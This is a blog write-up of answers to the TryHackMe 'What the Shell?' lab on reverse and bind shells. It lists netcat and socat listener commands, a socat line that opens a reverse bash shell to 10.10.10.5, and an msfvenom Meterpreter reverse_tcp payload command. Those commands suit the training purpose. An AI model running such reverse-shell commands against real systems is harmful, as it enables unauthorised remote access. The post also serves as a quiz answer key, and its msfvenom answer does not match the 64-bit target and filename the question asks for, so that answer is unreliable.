Skip to main content
HashnodeUntitled Publication

Command Palette

Search for a command to run...

What the Shell? - TryHackMe Write-up

Published
2 min read
What the Shell? - TryHackMe Write-up
B
b1gsh4d0w
Part of seriesTryHackMe Write-ups

Info

  • Name: What the Shell?
  • Description: An introduction to sending and receiving (reverse/bind) shells when exploiting target machines.
  • Difficulty: Easy
  • Room link: https://tryhackme.com/room/introtoshells

Write-up

Task 3

Q: Which type of shell connects back to a listening port on your computer, Reverse (R) or Bind (B)?

A: R

Q: You have injected malicious shell code into a website. Is the shell you receive likely to be interactive? (Y or N)

A: N

Q: When using a bind shell, would you execute a listener on the Attacker (A) or the Target (T)?

A: T

Task 4

Q: Which option tells netcat to listen?

A: -l

Q: How would you connect to a bind shell on the IP address: 10.10.10.11 with port 8080?

A: nc 10.10.10.11 8080

Task 5

Q: How would you change your terminal size to have 238 columns?

A: stty cols 238

Q: What is the syntax for setting up a Python3 webserver on port 80?

A: sudo python3 -m http.server 80

Task 6

Q: How would we get socat to listen on TCP port 8080?

A: TCP-L:8080

Task 7

Q: What is the syntax for setting up an OPENSSL-LISTENER using the tty technique from the previous task? Use port 53, and a PEM file called "encrypt.pem"

A: 

socat OPENSSL-LISTEN:53,cert=encrypt.pem,verify=0 FILE:`tty`,raw,echo=0

Q: If your IP is 10.10.10.5, what syntax would you use to connect back to this listener?

A: socat OPENSSL:10.10.10.5:53 EXEC:"bash -li",pty,stderr,sigint,setsid,sane

Task 8

Q: What command can be used to create a named pipe in Linux?

A: mkfifo

Task 9

Q: Which symbol is used to show that a shell is stageless?

A: _

Q: What command would you use to generate a staged meterpreter reverse shell for a 64bit Linux target, assuming your own IP was 10.10.10.5, and you were listening on port 443? The format for the shell is elf and the output filename should be shell

A: msfvenom -p linux/x86/meterpreter/reverse_tcp -f elf -o shell.elf LHOST=10.10.10.5 LPORT=443

Task 10

Q: What command can be used to start a listener in the background?

A: exploit -j

Q: If we had just received our tenth reverse shell in the current Metasploit session, what would be the command used to foreground it?

A: sessions 10

#tryhackme#write-up#shell

Comments

Join the discussion

No comments yet. Be the first to comment.

TryHackMe Write-ups

Part 8 of 20

In this series is where I post all the write-ups of the rooms I do in the TryHackMe website.

Up next

Blue - TryHackMe Write-up

Info Name: Blue Description: Deploy & hack into a Windows machine, leveraging common misconfigurations issues. Difficulty: Easy Room link: https://tryhackme.com/room/blue Write-up Task 1 Q: How many ports are open with a port number under 1000? A: ...

More from this blog

Untitled Publication

21 posts